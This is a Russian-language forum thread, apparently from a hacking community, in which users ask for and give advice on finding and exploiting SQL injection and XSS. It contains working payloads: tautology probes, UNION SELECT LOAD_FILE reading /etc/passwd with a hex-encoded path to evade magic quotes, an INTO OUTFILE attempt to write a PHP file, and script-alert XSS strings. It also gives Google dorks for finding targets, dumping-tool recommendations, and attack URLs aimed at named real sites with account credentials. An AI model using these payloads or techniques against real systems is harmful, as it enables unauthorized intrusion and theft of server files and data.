если надо просто найти скули то уже сказали в гугле ищи, но если надо найти на определенном сайте тогда придется везде на пост и гейт запросы поставит " ' +1=1 or+1=1 и тд. Прочитай статьи на этом форуме много узнаеш. Всё на софт поставит не рекомендую потому что иногда часто они пропускают нужные данные, тем более чтоб на софт кормит нужно найти и потом анализировать а уж потом поставит на правильный запрос. Рекомендуемые софты есть на этом форуме и на exploit.in --Sipt4 от от уважаемого SQLHack --Toolza1 от уважаемого Pashkela --Reiluke tools 2,7 от reiluke -- и новый Havij 1.07 от r3dm0v3 эти софты впольне хватет для начала. Лучше ручками потренируйся а потом для дампа юзаеш софты. PS. Я сам все ещё учусь на ошибках 453 не обязательно можеш искать google.ru => inurl:.php?id= inurl:.net
Подставлять во все видимые и невидимые переменные,нужный код,ну обычно "><script>alert()</script>, POST,GET,FILES,COOKIES, во все все которые пердаються скрипту,возможно так что то найдешь
такая конструкция ограничивает файлы которые можно прочитать? я правильно понимаю?... include_once($config['path_src_include'] . "common.inc.php"); include_once($config['path_src_include'] . "check_html.inc.php");
подскажите плз, нашел сайт, при вводе ?id=1' появляется ошибка You have ...а не меняется, подскажите что я не так делаю?
Code: http://rozetka.com.ua/index.php?search_text=%2522%253E%253Cscript%253Ealert%2528%2529%253C%252Fscript%253E&page=search&lang=ru&imageField.x=0&imageField.y=0 [/code] (пассивная) Какая-то странная реакция.. После 2 алертов открывается доп. активное окно поиска и высвечивается кусок кода " class="sinp" />. Что это значит? ))
не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую -1+UNION+SELECT+LOAD_FILE(etc/passwd); но мне выдается такая ошибка Unknown column 'etc' in 'field list' пробую на запись проверить, но пишет не правильный синтаксис -1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php'; You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1 кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php' подскажите нубу плз, что можно попробовать еще??
2Gidz, при меджик квотес у тебя инто оутфайл/дампфайл работать не будет. По поводу лоад файл: 1) -1+UNION+SELECT+LOAD_FILE(etc/passwd); <------ Это не верно, нужны кавычки: -1+UNION+SELECT+LOAD_FILE('/etc/passwd'); А так как у тебя меджик квотес - нужно хэксить, или чарить: -1+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764); Что бы не было дальнейших вопросов - скажу, что в инот оутфайл/дампфайл путь хексить/чарить НЕЛЬЗЯ.
не выводятся принтабельный столобец, перепробовал все.... Code: http://lanpolis.ru/private/?act1=cat&s=NDg1MTFANDg5VkgwOGhnczVQSQ==&cid=-5+and+1=2+union+select+1,2,3,4,5-- П.С. Запрос из личного кабинета, паблег акк: admin;admin П.П.С. можно в личку
Кто научит Sql injection? Уже и уязвимый скрипт написал ,но ни как не получается. Пожалуйста помогите дураку. юин 3355805
